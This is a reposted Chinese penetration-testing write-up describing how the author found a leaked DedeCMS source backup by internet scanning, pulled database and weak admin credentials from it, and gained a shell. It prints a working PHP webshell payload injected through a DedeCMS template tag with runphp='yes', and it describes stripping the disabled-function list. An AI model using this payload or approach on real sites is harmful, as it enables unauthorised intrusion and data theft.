记一次从源码泄露到getshell
2023-3-11 20:32:30 Author: 白帽子左一(查看原文) 阅读量:28 收藏

扫码领资料

获网安教程

免费&进群

前言:

此次渗透中的所有修改已经复原,且漏洞已经提交至cnvd平台

源码泄露

在一个月黑风高的夜晚,闲来无事的我又开着脚本利用hunter进行互联网站点源码的扫描

在查看备份文件扫描结果时,看到了宝贝

二话不说,访问下载得到源码!

可以在注释信息处发现dedecms的痕迹

敏感信息泄露

获得源码的第一步当然是获取敏感信息

先尝试全局搜索(crtl+shift+f)关键词

key
pwd
passwd
password

1.数据库信息泄露

2.后台管理员密码泄露

md5解密尝试解密,居然是一个弱口令

有了账户密码后当然是要找到后台管理地址,那么有了源码后台管理地址还不是手到擒来?

后台RCE->getshell

源码中找到后台地址(居然改了个888)

用泄露的admin/admin888进入后台后,发现版本信息为dedecms PS1

历史漏洞

既然已经获得了cms信息,第一步当然看看他的历史漏洞

查找SP1历史漏洞都是远程代码包含漏洞,但是这个站点已经将关键文件install.php删除(源码中不存在)

抱着侥幸心里又去尝试访问l一下(说不定后来又加上了呢)确实不存在,只能继续查看其他功能点

然后也尝试测试了许多SP2的漏洞payload但均失败

继续测试其他点

继续查看发现系统设置->系统基本参数->其他选项中有模板引擎的禁用函数

但是明明没有模板引擎功能他为什么要禁用呢?

我带着这个疑问又重新翻看源码

果然又找到模板相关文件,(说明只是功能点被隐藏,文件依旧还在)

尝试访问,成功访问到并且能够正常执行

那么就好办了,根据dedecms模板规则,后台模板写入payload,访问即可执行PHP代码

{dede:field name='source' runphp='yes'}@eval($_POST['lyy']);{/dede:field}
//调用方式 [field:字段名/] 这里的关键是runphp='yes'
//php代码则是简单的一句话

然后去将其他选项中的禁用函数全部删除保存

因为注入到了index.htm

所以连接webshell 的 url为首页

http://xxxxx:9890/index.php

成功getshell

本来还应该通过源码泄露得到的数据库账户密码尝试连接数据库的,但这里删shell跑路太急了就忘记了测了

作者:先知社区【lyy】转载自:https://xz.aliyun.com/t/10692

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权

@
学习更多渗透技能!体验靶场实战练习

hack视频资料及工具

(部分展示)

往期推荐

【精选】SRC快速入门+上分小秘籍+实战指南

爬取免费代理,拥有自己的代理池

漏洞挖掘|密码找回中的套路

渗透测试岗位面试题(重点:渗透思路)

漏洞挖掘 | 通用型漏洞挖掘思路技巧

干货|列了几种均能过安全狗的方法!

一名大学生的黑客成长史到入狱的自述

攻防演练|红队手段之将蓝队逼到关站!

巧用FOFA挖到你的第一个漏洞

看到这里了,点个“赞”、“再看”吧

文章来源: http://mp.weixin.qq.com/s?__biz=MzI4NTcxMjQ1MA==&mid=2247592909&idx=1&sn=7b70d8ee33e6f13f8b4aac9486ee9e0a&chksm=ebeb22e0dc9cabf65ddbeca6f01df90103ea2f98062596627d5d72856df61c805071ed141ba5#rd
如有侵权请联系:admin#unsafe.sh